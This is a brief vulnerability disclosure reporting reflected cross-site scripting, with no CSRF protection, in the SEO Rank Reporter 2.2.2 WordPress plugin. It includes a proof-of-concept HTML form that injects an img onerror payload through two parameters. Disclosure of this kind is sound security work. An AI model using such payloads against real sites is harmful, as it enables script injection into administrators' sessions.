Subject: Cross-Site Scripting (XSS) in SEO Rank Reporter 2.2.2

Date: Mon, 24 Aug 2015 10:59:11 +0200

Hello,

Plugin: SEO Rank Reporter 2.2.2 https://wordpress.org/plugins/seo-rank-reporter/

1. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: POST

Url: http://localhost/wp-admin/admin.php?page=seo-rank-keywords

Vulnerable parameters: keyword_item, entry_url

Example PHP callstack:

/seo-rank-reporter/add-keywords.php:57

Verification:

--

<form method="POST" action="http://localhost/wp-admin/admin.php?page=seo-rank-keywords" />

<input type="text" name="first_submit_keyw" value="Add to Reporter" />

<input type="text" name="keyword_item" value='"><img src=x onerror=alert(1) />'>

<input type="text" name="entry_url" value='"><img src=x onerror=alert(2) />'>

<input type="submit" />

</form>

--

--

Regards,
Marcin Probola,